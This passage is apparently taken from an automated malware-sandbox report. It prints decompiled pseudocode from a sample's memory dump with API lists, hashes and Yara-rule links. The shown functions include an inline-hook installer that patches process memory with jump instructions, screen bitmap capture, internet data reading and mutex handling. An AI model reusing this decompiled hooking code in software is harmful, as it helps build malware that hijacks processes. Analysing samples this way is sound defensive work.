													_t114 = _a4;
													_t87 = E00411DB5(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E004128AD(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E004119C1(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E0040DB49(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x0040dba9
0x0040dbc4
0x0040dd86
0x0040dd8e
0x0040dd8e
0x0040dbca
0x0040dbcd
0x0040dbeb
0x0040dbed
0x0040dbf1
0x0040dbf3
0x00000000
0x00000000
0x0040dc0a
0x0040dc10
0x0040dc12
0x0040dd80
0x0040dd81
0x00000000
0x0040dd81
0x0040dc18
0x0040dc1d
0x0040dc22
0x0040dc24
0x00000000
0x00000000
0x0040dc2f
0x0040dc34
0x0040dc38
0x0040dc3a
0x0040dc40
0x0040dc40
0x0040dc48
0x0040dc4c
0x0040dc54
0x0040dc55
0x0040dc55
0x0040dc5b
0x0040dc66
0x0040dc67
0x0040dc72
0x0040dc73
0x0040dc7e
0x0040dc7f
0x0040dc84
0x0040dc9e
0x0040dca4
0x0040dca6
0x0040dcc2
0x0040dcc4
0x0040dcc7
0x0040dccc
0x0040dce7
0x0040dced
0x0040dcef
0x0040dd03
0x0040dd09
0x0040dd0b
0x0040dd11
0x0040dd16
0x0040dd18
0x0040dd1c
0x0040dd20
0x0040dd21
0x0040dd26
0x0040dd27
0x0040dd2d
0x0040dd2e
0x0040dd38
0x0040dd38
0x0040dd3e
0x0040dd43
0x0040dd46
0x0040dd48
0x0040dd4a
0x0040dd50
0x0040dd55
0x0040dd57
0x0040dd59
0x0040dd59
0x0040dd59
0x0040dd59
0x0040dd57
0x0040dd48
0x0040dd18
0x0040dd0b
0x0040dcef
0x0040dccc
0x0040dd62
0x0040dd67
0x0040dd6b
0x0040dd6b
0x0040dd77
0x0040dd7c
0x0040dd7c
0x00000000
0x0040dbcf
0x0040dbd7
0x00000000
0x0040dbd7

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

GetPrivateProfileStringW.KERNEL32 ref: 0040DC0A
GetPrivateProfileStringW.KERNEL32 ref: 0040DC9E
GetPrivateProfileIntW.KERNEL32 ref: 0040DCBC
GetPrivateProfileStringW.KERNEL32 ref: 0040DCE7
GetPrivateProfileStringW.KERNEL32 ref: 0040DD03

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: b7ef829bcc7d06c591400c19a3bb38e5629a046d963c91084332f0aed9e04ee1
Instruction ID: c94c48782572b3a6706b727aa00e2fa201f39d8a7617c92c457f2ea62ec5c5d4
Opcode Fuzzy Hash: b7ef829bcc7d06c591400c19a3bb38e5629a046d963c91084332f0aed9e04ee1
Instruction Fuzzy Hash: B851C031504306ABD710AB65DC01FEBBBE8AF44754F04093EFA84E62E1D738D949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041782A, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041782A(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E00416CF5(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E00416CA5( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E00416CA5( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E00416CA5( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0041782a
0x0041782a
0x0041782a
0x00417832
0x00417847
0x0041784b
0x00417851
0x00417856
0x0041785d
0x00417866
0x00417869
0x0041786f
0x00417896
0x00417898
0x0041789e
0x00417871
0x00417873
0x0041793b
0x0041793b
0x0041793f
0x0041793f
0x0041793f
0x00417948
0x0041794c
0x00417879
0x00417886
0x00417889
0x00417894
0x004178a8
0x004178a8
0x004178ab
0x00000000
0x00000000
0x004178b1
0x004178b5
0x00417915
0x0041791e
0x00417923
0x00417925
0x00000000
0x0041792b
0x0041792d
0x00417933
0x00417935
0x00000000
0x00000000
0x00000000
0x00000000
0x00417935
0x004178b7
0x004178ba
0x004178c6
0x004178c9
0x004178cc
0x004178ce
0x004178d1
0x004178d4
0x00417913
0x00417913
0x00417913
0x00000000
0x004178d6
0x004178d6
0x004178dd
0x004178dd
0x004178e2
0x00000000
0x004178e4
0x004178ea
0x004178ef
0x004178f1
0x00000000
0x004178f3
0x00417901
0x00417904
0x00417907
0x0041790d
0x0041790f
0x004178a6
0x004178a6
0x00000000
0x00417911
0x00000000
0x00417911
0x0041790f
0x004178f1
0x004178d8
0x004178d8
0x004178db
0x00000000
0x00000000
0x00000000
0x00000000
0x004178db
0x004178d6
0x004178d4
0x00000000
0x004178b5
0x00000000
0x00000000
0x00000000
0x00000000
0x00417894
0x00417873
0x0041786f
0x00417951
0x00417957

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0041784B

Part of subcall function 00416CF5: GetFileSizeEx.KERNEL32(bxA,bxA,?,?,?,00417862,00000000), ref: 00416D01

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041788C
CloseHandle.KERNEL32(?,00000000), ref: 00417898
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00417907
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041792D

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: eef4e7b40a205c099c44fd660deb7ada8d9dc64efaa12c9a7b18c198df01e4a1
Instruction ID: 4f827263ba2e63c6e9ab5c2cfd29c4ea2926b1f40d47ad957ee41e258db1c62c
Opcode Fuzzy Hash: eef4e7b40a205c099c44fd660deb7ada8d9dc64efaa12c9a7b18c198df01e4a1
Instruction Fuzzy Hash: 8F41E470904204AFEF209F65CC49FEFBFB5EF84354F10452AF595A22A0D7398585CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004161FD, Relevance: 7.6, APIs: 5, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004161FD(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E004161B8(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E00411A74( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t66 =  &_v48;
						_push(0);
						_push(_t66);
						while(1) {
							_t47 = E0041D9B0(_t58, _t61, _t63, _t66, _t69);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t69 = _t69 + _t47;
							if(_t69 > 0x1e) {
								L16:
								goto L17;
							}
							_t61 =  *_t66;
							if(_t61 == 0xe9 || _t61 == 0xe8) {
								if(_t47 == 5) {
									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
								}
							}
							_push(0);
							if(_t69 >= 5) {
								_t17 = _t69 + 5; // 0x5
								_t68 = _t17;
								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
									_t62 = _a4;
									_v48 = 0xe9;
									_v47 = _t58 - _t62 - 5;
									E0041972D(_t62, _a8);
									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
										_v12 = _t68;
									}
								}
								goto L16;
							}
							_t66 = _t71 + _t69 - 0x2c;
							_push(_t66);
						}
						goto L16;
					}
				}
			}

0x004161fd
0x004161fd
0x00416205
0x0041620a
0x0041620c
0x00416217
0x00416311
0x00416317
0x00416238
0x00416240
0x00416259
0x004162fd
0x0041630b
0x00000000
0x0041625f
0x00416260
0x00416263
0x00416266
0x0041629a
0x0041629a
0x004162a2
0x00000000
0x00000000
0x00416269
0x0041626e
0x004162fc
0x00000000
0x004162fc
0x00416274
0x00416279
0x00416283
0x0041628b
0x0041628b
0x00416283
0x0041628e
0x00416293
0x004162ac
0x004162ac
0x004162b2
0x004162be
0x004162cf
0x004162d1
0x004162dc
0x004162e0
0x004162e3
0x004162f7
0x004162f9
0x004162f9
0x004162f7
0x00000000
0x004162cf
0x00416295
0x00416299
0x00416299
0x00000000
0x004162a4
0x00416259

APIs

Part of subcall function 004161B8: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,004196CD,00000000,00000000,00000034,00419A58,00422008,00000000), ref: 004161CD

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,00405EF8,-00000008,00000034,?,?,004197EE,?,00000000,?,?,00419A58,00422008), ref: 0041622A
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,004197EE,?,00000000,?,?,00419A58), ref: 00416251
WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 004162CB
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 004162F3
VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00405EF8,00405EF8,?,?,004197EE,?,00000000,?,?,00419A58,00422008,00000000,00405EF8), ref: 0041630B

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: b9c8a9fa11dee6ddc2340df223019b3efda4439838cb63544a01e672cb5941b9
Instruction ID: 1a6c424b6eea7adf7f62fde8d02dfc5aae6a1e6a5754b123583d2ed04a3e9ba8
Opcode Fuzzy Hash: b9c8a9fa11dee6ddc2340df223019b3efda4439838cb63544a01e672cb5941b9
Instruction Fuzzy Hash: 2D318372A00219AADF10AFFDCC44EDE7BA8DB09370F118356F935A61D0C774D9808B69

Uniqueness

Uniqueness Score: -1.00%

Function 00417F5F, Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00417F5F(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E00411991(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E004119C1(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x00417f5f
0x00417f6d
0x00417f75
0x00417f79
0x00418041
0x00418044
0x00418049
0x00418049
0x0041804f
0x00418056
0x00418056
0x00417f8e
0x00417f9b
0x0041803b
0x0041803c
0x00000000
0x00417fb7
0x00417fba
0x00417fc3
0x00417fce
0x00417fd0
0x00417fd1
0x00417fd4
0x00417fd7
0x00417fe7
0x00417fe7
0x00417fea
0x00417fec
0x00417fef
0x00417fef
0x00417ff0
0x00417ff4
0x00417ffc
0x00418002
0x00418003
0x0041800b
0x00418010
0x00418013
0x00418018
0x0041801a
0x0041801a
0x0041802a
0x00418030
0x00418035
0x00000000
0x00000000
0x00000000
0x00000000
0x00418035
0x00417fd9
0x00417fdc
0x00000000
0x00000000
0x00417fe1
0x00000000
0x00000000
0x00417fe3
0x00000000
0x00417fe3

APIs

GetDIBits.GDI32(00000000,0041A898,00000000,00000001,00000000,00000000,00000000), ref: 00417F97
GetDIBits.GDI32(00000000,0041A898,00000000,00000001,00000000,00000000,00000000), ref: 00417FAD
DeleteObject.GDI32(0041A898), ref: 00417FBA
CreateDIBSection.GDI32(00000000,00000000,00000000,00423E98,?,?), ref: 0041802A
DeleteObject.GDI32(0041A898), ref: 00418049

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
Instruction ID: 40559dcd694d4d123429646349e1dd915b7696b92f233c6086b9c32355f4dc25
Opcode Fuzzy Hash: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
Instruction Fuzzy Hash: 7E31D6B210060AAFDF208F25CD849AB7FE9EF08384B05842FF985D6260C739DD91DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B96D, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041B96D(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E00411991(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0041B924);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00411A74( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E0041194C( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E004119FD( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E004119C1(_v84);
						if(_v89 == 0) {
							E004119C1( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0041512E( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E004119C1(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0041b96d
0x0041b97b
0x0041b986
0x0041b98b
0x0041b98d
0x0041b993
0x0041b9a2
0x0041b9b0
0x0041b9b4
0x0041b9b5
0x0041b9bd
0x0041b9c5
0x0041b9c7
0x0041b9cc
0x0041b9d5
0x0041b9d9
0x0041b9dd
0x0041b9dd
0x0041b9e0
0x0041b9e8
0x0041b9f0
0x0041b9f8
0x00000000
0x00000000
0x0041ba16
0x0041ba1e
0x0041ba28
0x0041ba48
0x0041ba48
0x0041ba2a
0x0041ba39
0x0041ba42
0x0041ba44
0x00000000
0x0041ba44
0x0041ba28
0x0041ba4d
0x0041ba54
0x0041ba5e
0x0041ba64
0x0041ba6e
0x0041ba75
0x0041ba75
0x0041ba7a
0x00000000
0x0041ba7a
0x0041ba05
0x00000000
0x0041ba07
0x0041ba0b
0x00000000
0x0041ba0b
0x00000000
0x0041b995
0x0041b996
0x0041b99b
0x0041b99b
0x0041ba7e
0x0041ba83

APIs

ResetEvent.KERNEL32(?), ref: 0041B97B
InternetSetStatusCallbackW.WININET(?,0041B924), ref: 0041B9B0
InternetReadFileExA.WININET ref: 0041B9F0
GetLastError.KERNEL32 ref: 0041B9FA
InternetSetStatusCallbackW.WININET(?,?), ref: 0041BA5E

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: 5c1972086a1d4a0a0853782985e7c98751ac124f3bffe0cd9e66b9385f752d0f
Instruction ID: 263768d4e3d02d07b60f54e9964b35cec6aa39e0937ba7c77b4c5ea1df5b5c5e
Opcode Fuzzy Hash: 5c1972086a1d4a0a0853782985e7c98751ac124f3bffe0cd9e66b9385f752d0f
Instruction Fuzzy Hash: 3831A0B1118345EFCB01DF65CC40AAEBBE8FF48344F00492AF99497261D738C994CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5B6, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C5B6(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E0040C445( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E004160C7( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x0040c5b6
0x0040c5c1
0x0040c5c7
0x0040c5d0
0x0040c5dd
0x0040c681
0x0040c689
0x0040c689
0x0040c5e3
0x0040c5e6
0x0040c5ef
0x0040c5f8
0x0040c5f1
0x0040c5f1
0x0040c5f1
0x0040c601
0x0040c645
0x00000000
0x0040c603
0x0040c61c
0x0040c64b
0x0040c656
0x0040c661
0x0040c668
0x0040c674
0x0040c67c
0x0040c67c
0x00000000
0x0040c674
0x0040c62d
0x00000000
0x00000000
0x0040c640
0x0040c647
0x0040c649
0x00000000
0x00000000
0x00000000
0x0040c649

APIs

GetWindowInfo.USER32 ref: 0040C5D5
IntersectRect.USER32 ref: 0040C613
IsRectEmpty.USER32(?), ref: 0040C625
IntersectRect.USER32 ref: 0040C63C
GetTopWindow.USER32(?), ref: 0040C66C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 3ac7d200c590fd5bbc5d4adb268f53059d357df87f962ce0771fe2e2e617c04d
Instruction ID: 48d0fa5ea1845324a5204aadeef972c21bf40a3147c560864f93f652eb586b88
Opcode Fuzzy Hash: 3ac7d200c590fd5bbc5d4adb268f53059d357df87f962ce0771fe2e2e617c04d
Instruction Fuzzy Hash: 89215EB1500301DBDB30DF28DD84A5BB7ECAF44714B050B2AF886E3251DB39E81A8B75

Uniqueness

Uniqueness Score: -1.00%

Function 0040A352, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A352(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				void* _t26;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0040634D(_t40, _t50, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00406312(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E0040666E(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00412510(_t43);
					_t24 = E00406473();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E00415194(_v12);
						__eflags = 0;
						return 0;
					}
					_t26 = 3;
					E00419DD3(_t26,  &_v104);
					_t28 = WaitForSingleObject( *0x4229f4, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E00415C40(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x4229f4, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x0040a352
0x0040a352
0x0040a364
0x0040a371
0x0040a376
0x0040a37b
0x0040a392
0x0040a399
0x0040a39f
0x0040a3a7
0x0040a3ad
0x0040a3b4
0x0040a3b7
0x0040a3bc
0x0040a3be
0x0040a41d
0x0040a420
0x0040a425
0x00000000
0x0040a427
0x0040a3c7
0x0040a3c8
0x0040a3df
0x0040a3e4
0x0040a3e6
0x0040a41b
0x00000000
0x0040a41c
0x0040a3ef
0x0040a3f2
0x0040a409
0x0040a415
0x0040a417
0x0040a417
0x00000000
0x0040a3f2
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 0040A35D
SetThreadPriority.KERNEL32(00000000), ref: 0040A364

Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0040A3A7
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0040A3DF
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0040A415

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: df236223baae1e25738383cd782500ac8301a2d5e5cc88e0b164ee8f4157e6bd
Instruction ID: 2b325332d5bdb500921781ca153ea54d3b56016a980df4b80f2286af398d617f
Opcode Fuzzy Hash: df236223baae1e25738383cd782500ac8301a2d5e5cc88e0b164ee8f4157e6bd
